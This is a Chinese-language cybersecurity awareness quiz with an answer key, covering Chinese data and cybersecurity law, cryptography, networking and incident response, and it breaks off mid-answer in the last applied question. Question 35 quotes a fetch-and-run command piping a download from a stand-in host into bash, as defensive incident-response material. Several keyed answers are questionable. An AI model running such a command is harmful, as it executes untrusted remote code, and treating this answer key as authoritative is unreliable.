国家网络安全宣传周知识竞赛题目及答案(完整版)

国家网络安全宣传周知识竞赛题目及答案(完整版)一、单项选择题（每题1分，共30分。每题只有一个正确答案，请将正确选项字母填入括号内）1.2022年《中华人民共和国数据安全法》正式施行的日期是（）。A.2021年6月10日 B.2021年9月1日 C.2022年1月1日 D.2022年3月1日答案：B2.下列哪一项不属于《网络安全法》明确的“关键信息基础设施”范围（）。A.水利枢纽 B.大型电商平台 C.三甲医院 D.个人博客答案：D3.在等级保护2.0通用要求中，第三级系统应至少多久完成一次等级测评（）。A.每季度 B.每半年 C.每年 D.每两年答案：C4.利用“伪基站”发送虚假银行积分兑换短信的行为，在刑法修正案（九）中通常被认定为（）。A.破坏计算机信息系统罪 B.侵犯公民个人信息罪 C.扰乱无线电通讯管理秩序罪 D.非法经营罪答案：C5.关于WannaCry勒索病毒，下列描述正确的是（）。A.利用“心脏出血”漏洞传播 B.首次爆发于2018年 C.利用SMB协议漏洞EternalBlue D.只感染Linux系统答案：C6.在密码学中，AES128的密钥长度是（）。A.64位 B.128位 C.192位 D.256位答案：B7.我国《个人信息保护法》规定，处理敏感个人信息应当取得个人的（）。A.明示同意 B.书面同意 C.单独同意 D.默示同意答案：C8.下列哪项不是社会工程学攻击的常见手段（）。A.鱼叉邮件 B.肩窥 C.彩虹表 D.冒充客服答案：C9.在Windows系统中，用于查看当前TCP连接状况的命令是（）。A.ipconfig B.netstat C.tracert D.nslookup答案：B10.根据《关键信息基础设施安全保护条例》，运营者采购网络产品或服务可能影响国家安全的，应当通过（）。A.网络安全审查 B.等保测评 C.密码测评 D.漏洞扫描答案：A11.下列哪项技术主要用于防止源IP地址欺骗（）。A.SYNCookie B.IPSec C.uRPF D.NAT答案：C12.在SSL/TLS握手过程中，用于协商加密套件的消息是（）。A.ClientHello B.ServerHello C.Certificate D.Finished答案：A13.我国“网络安全宣传周”首次举办的年份是（）。A.2013 B.2014 C.2015 D.2016答案：B14.下列哪项不是《数据出境安全评估办法》中触发评估的情形（）。A.处理100万人以上个人信息 B.累计向境外提供10万人敏感个人信息 C.数据处理者当年营收超1亿元 D.关键信息基础设施运营者数据出境答案：C15.在Linux系统中，为/etc/shadow文件设置安全权限，应使用（）。A.chmod644 B.chmod600 C.chmod755 D.chmod400答案：B16.关于双因素认证，下列组合中安全性最低的是（）。A.指纹+短信验证码 B.硬件令牌+PIN码 C.静态密码+安全问题 D.人脸+FIDO2密钥答案：C17.下列哪项漏洞属于逻辑缺陷而非内存破坏（）。A.缓冲区溢出 B.整数溢出 C.条件竞争 D.UAF答案：C18.在IPv6中，用于本地链路通信的地址前缀是（）。A.fe80::/10 B.2001:db8::/32 C.::1/128 D.fc00::/7答案：A19.《网络安全法》规定，网络运营者应当采取技术措施确保个人信息安全，防止信息泄露、毁损、丢失，保存期限不得少于（）。A.30天 B.60天 C.6个月 D.法律、行政法规规定的最短期限答案：D20.下列哪项不是我国《网络安全产业高质量发展三年行动计划（20212023年）》提出的重点方向（）。A.数据安全 B.工业互联网安全 C.量子加密标准化 D.元宇宙游戏引擎答案：D21.在OWASPTop102021中，排名首位的风险是（）。A.注入 B.失效的访问控制 C.加密失败 D.不安全设计答案：B22.下列哪项不是DNS安全扩展技术（）。A.DNSSEC B.DNSoverTLS C.DNSoverHTTPS D.DNS放大攻击答案：D23.关于“零信任”架构，下列说法错误的是（）。A.默认不信任任何访问主体 B.先连接后验证 C.持续信任评估 D.最小权限访问答案：B24.在密码模块安全等级中，GM/T0028规定的最高等级是（）。A.一级 B.二级 C.三级 D.四级答案：D25.下列哪项不是勒索软件常用的横向移动手段（）。A.PsExec B.WMI C.RDP暴力破解 D.SQL注入答案：D26.根据《信息安全技术网络安全等级保护基本要求》，第三级系统应对审计记录保存至少（）。A.1个月 B.3个月 C.6个月 D.1年答案：C27.在Windows日志中，事件ID4624表示（）。A.登录失败 B.成功登录 C.账户锁定 D.权限提升答案：B28.下列哪项不是我国《汽车数据安全管理若干规定（试行）》要求处理敏感个人信息的原则（）。A.车内处理 B.默认不收集 C.精度范围适用 D.数据最小化 E.永久保存答案：E29.在无线安全中，WPA3Personal采用的主要密钥协商协议是（）。A.WEP B.TKIP C.SAE D.LEAP答案：C30.根据《网络产品安全漏洞管理规定》，漏洞发现者向工信部报送漏洞的时限为（）。A.1日 B.2日 C.3日 D.7日答案：B二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）31.以下哪些属于《个人信息保护法》规定的敏感个人信息（）。A.宗教信仰 B.精确位置轨迹 C.身份证号 D.交易密码 E.网页浏览记录答案：A、B、D32.下列哪些攻击可导致服务器端请求伪造（SSRF）（）。A.通过URL参数导入图片 B.未校验的302跳转 C.XML外部实体注入 D.JSONP回调污染 E.未过滤的FTP协议答案：A、B、E33.关于我国《密码法》，下列说法正确的有（）。A.将密码分为核心密码、普通密码和商用密码 B.国家密码管理部门负责管理全国密码工作 C.商用密码产品必须取得型号证书方可销售 D.任何组织不得销售境外生产的密码产品 E.违反规定可处50万元以上罚款答案：A、B、C、E34.以下哪些措施可有效防御钓鱼邮件（）。A.SPF记录 B.DKIM签名 C.DMARC策略 D.邮件网关URL沙箱 E.关闭SMTP服务答案：A、B、C、D35.在Linux服务器中，发现/root/.bash_history文件出现大量“curlhttp://evil.sh|bash”，应采取的应急步骤包括（）。A.立即断开网络 B.保存内存镜像 C.修改root密码 D.覆盖history文件 E.检查crontab及systemd定时任务答案：A、B、C、E36.下列哪些属于《数据安全法》规定的数据处理活动（）。A.收集 B.存储 C.使用 D.删除 E.传输答案：A、B、C、D、E37.以下哪些属于我国《网络安全审查办法》明确的“影响国家安全”风险考虑因素（）。A.关键信息基础设施被非法控制风险 B.核心数据被恶意利用风险 C.供应链中断风险 D.用户个人信息泄露风险 E.政治舆论操纵风险答案：A、B、C、E38.下列哪些端口常与远程桌面协议相关（）。A.TCP22 B.TCP3389 C.TCP5900 D.UDP3389 E.TCP443答案：B、D39.关于硬件安全模块（HSM），下列说法正确的有（）。A.提供防篡改的密钥存储 B.支持国密SM2算法 C.必须通过FIPS1402三级以上认证才能在国内使用 D.可用于CA根密钥保护 E.支持密钥托管与恢复答案：A、B、D、E40.以下哪些属于《信息安全技术个人信息安全规范》（GB/T352732020）提出的个人信息处理基本原则（）。A.权责一致 B.目的明确 C.最少够用 D.公开透明 E.确保安全答案：A、B、C、D、E三、填空题（每空1分，共20分）41.我国《网络安全法》规定，网络运营者收集和使用个人信息应当遵循“合法、正当、______”的原则。答案：必要42.在SSL/TLS协议中，用于完成密钥交换的算法常见的有RSA、ECDHE和______。答案：DHE43.2019年发布的《信息安全技术网络安全等级保护基本要求》简称______。答案：等保2.044.在Windows系统中，用于查看本地安全策略的命令是______。答案：secpol.msc45.根据《数据安全法》，国家建立数据______保护制度，对影响国家安全的数据实施出口管制。答案：跨境46.在Linux中，用于限制用户密码复杂度的配置文件路径通常为/etc/pam.d/______。答案：systemauth47.我国《密码法》规定，商用密码产品检测认证适用______原则。答案：自愿48.在IPv6地址2001:0db8:0000:0000:0000:ff00:0042:8329中，可压缩为______。答案：2001:db8::ff00:42:832949.在OWASPTop10中，______是指攻击者通过向解释器发送恶意数据，导致解释器执行非预期命令。答案：注入50.根据《个人信息保护法》，个人信息处理者应当定期对其处理个人信息遵守法律、行政法规的情况进行______。答案：合规审计51.在无线网络安全中，WEP采用______位或104位密钥。答案：4052.在密码学中，SM2算法基于的数学难题是______曲线离散对数问题。答案：椭圆53.在Windows事件日志中，安全日志文件默认路径为C:\Windows\System32\winevt\Logs\______。答案：Security.evtx54.根据《网络产品安全漏洞管理规定》，网络产品提供者应在漏洞发现后______日内向工信部报送。答案：255.在Linux系统中，用于强制访问控制的安全模块______，可实现基于角色的权限管理。答案：SELinux56.在数字取证中，对硬盘进行位对位复制的常用工具是______。答案：dd57.在TCP三次握手过程中，第二次握手时服务器发送的标志位为SYN+______。答案：ACK58.根据《汽车数据安全管理若干规定（试行）》，重要数据应当依法在______境内存储。答案：中国59.在网络安全中，______攻击是指攻击者通过伪造源MAC地址，将流量重定向到自身。答案：ARP欺骗60.在等级保护2.0中，安全区域边界要求对进出网络的数据流实现基于应用协议和______的深度检测。答案：内容四、判断题（每题1分，共10分。正确打“√”，错误打“×”）61.《网络安全法》规定，国家网信部门负责统筹协调网络安全工作和相关监督管理工作。（√）62.在Linux系统中，文件权限为“rwrr”表示该文件对所有用户可写。（×）63.WPA3Enterprise仅支持AES加密，不再支持TKIP。（√）64.根据《数据安全法》，数据处理者无需建立数据安全应急处置机制。（×）65.在数字证书中，Subject字段用于标识证书持有者信息。（√）66.我国《密码法》规定，任何组织和个人不得利用密码从事违法犯罪活动。（√）67.在SSL/TLS中，使用自签名证书一定存在中间人攻击风险。（√）68.在Windows系统中，关闭SMB服务可以完全阻止永恒之蓝漏洞利用。（√）69.根据《个人信息保护法》，个人信息出境只能通过安全评估一种机制。（×）70.在IPv6中，地址空间大小为2^128。（√）五、简答题（封闭型，每题5分，共20分）71.简述《网络安全法》对关键信息基础设施运营者提出的安全保护义务。答案：1.设置专门安全管理机构；2.开展等级保护；3.采购安全可信产品和服务；4.签订安全保密协议；5.每年至少一次安全风险评估；6.数据境内存储；7.制定应急预案并定期演练；8.向主管部门报告重大事件。72.简述零信任架构的核心理念。答案：默认不信任任何主体（用户、设备、应用），无论其位于网络内外；持续验证身份与上下文；最小权限访问；动态访问控制；基于风险自适应。73.简述SQL注入漏洞的两种常见防御方法并说明原理。答案：1.预编译参数化查询：将SQL语句与数据分离，数据库引擎不将输入作为代码执行；2.输入验证与过滤：使用白名单限制字符集，阻断恶意payload。74.简述数字签名在电子合同中的作用。答案：1.完整性：合同内容一旦被篡改，签名验证失败；2.身份认证：私钥唯一对应签名人；3.不可否认：签名人无法事后否认签署行为；4.时间戳：结合可信时间源，确定签署时点。六、简答题（开放型，每题10分，共20分）75.某省级政务云平台计划将健康码数据迁移至异地灾备中心，涉及1.2亿条个人信息，其中包含人脸识别特征。请结合《个人信息保护法》《数据安全法》《数据出境安全评估办法》阐述应履行的合规流程与风险要点。答案：1.识别敏感个人信息：人脸识别特征属于敏感个人信息，需取得数据主体单独同意；2.开展数据出境风险自评估：评估内容包括合法性、正当性、必要性，境外接收方安保能力，数据主体权益保障；3.向省级网信部门申报数据出境安全评估：提交自评估报告、合同、用户协议、接收方安保措施、数据出境链路加密方案；4.与接收方签订标准合同：明确数据使用目的、范围、存储期限、再转移限制、删除义务、违约责任；5.技术措施：采用国密SM4加密传输，建立端到端VPN隧道，使用HSM管理密钥；6.组织措施：设置数据保护官（DPO），建立跨境数据审计日志，保存不少于3年；7.应急响应：制定数据泄露应急预案，72小时内向主管部门报告；8.持续监督：每年复评接收方安保水平，出现风险时暂停出境；9.风险要点：接收方所在国法律对中国数据主权可能存在的域外效力；人脸识别数据一旦泄露无法“撤销”；大规模数据关联分析可能导致公民行踪轨迹还原；需防范第三方通过法律程序调取数据。76.某大型国企发现其工业控制网络出现周期性异常流量，疑似APT组织利用PLC漏洞进行横向移动。请设计一套包含“检测—分析—遏制—根除—恢复—总结”六阶段的应急响应方案，并说明各阶段关键技术和管理措施。答案：1.检测：在OT边界部署工业防火墙与深度包检测（DPI），利用白名单基线发现异常Modbus/TCP功能码；SIEM关联IT侧日志与OT侧告警；2.分析：采用“网络+主机+物理”三维取证，网络侧采集PCAP，主机侧对工程师站做内存镜像，物理侧检查PLC固件完整性；使用沙箱还原攻击样本，确认利用的是CVE202015782（S7commplus堆溢出）；3.遏制：在防火墙上对异常S7通信端口102实施动态封禁；将受感染PLC切换至“手动/安全”模式；通过MicroSD卡刷新干净固件；4.根除：升级PLC固件至V2.8.1，启用密码保护及TLS加密；对工程师站打补丁并卸载老旧Step7；重置所有SSH/Telnet默认口令；5.恢复：按“先测试后上线”原则，先在仿真PLC验证逻辑，再逐步恢复生产；启用冗余PLC热备，确保单点故障不停产；6.总结：形成事件报告，向工信部威胁平台报送IOC；修订《工控安全应急预案》，增加“PLC固件完整性校验”条款；开展红蓝对抗演练，验证2小时内完成异常流量隔离；管理措施：建立OT安全运营中心（OTSOC），实行7×24小时值守；将OT网络纳入等保三级，每年至少一次渗透测试；与自动化厂商、安全厂商、主管部门建立三方协同机制；对关键岗位员工开展“鱼叉邮件+物理社工”复训。七、应用题（综合类，20分）77.背景：某金融公司计划上线一套基于云原生架构的移动支付系统，系统组件包括：互联网移动端APP（iOS/Android）部署在阿里云ACK集群的微服务（SpringCloud）使用RDSMySQL、PolarDB、Redis通过API网关对接银联、央行征信需满足等保三级、个人保、数据安全法、央行《个人金融信息保护技术规范》任务：（1）绘制该系统的数据流图，标注数据分类（个人一般信息、敏感信息、交易信息、支付敏感信息），并给出数据加密方案（含算法、密钥管理、存储方式）。（8分）（2）设计一套覆盖“身份鉴别—访问控制—安全审计—通信完整性—数据保密性”五个控制点的技术实现方案，并说明与等保三级要求的对应关系。（8分）（3）若该系统需将风控模型训练所需的用户标签数据（含身份证号、设备指纹、地理位置）传输至境外AI实验室，请计算触发数据出境安全评估的个人信息数量阈值，并给出降低合规风险的三种可行技术路线。（4分）答案：（1）数据流图：APP→HTTPS（TLS1.3+SM2国密证书）→API网关→微服务（Pod级mTLS）→RDS/PolarDB（SM4透明加密）→Redis（SM4+密钥轮转）→银联/征信（专线+IPSecV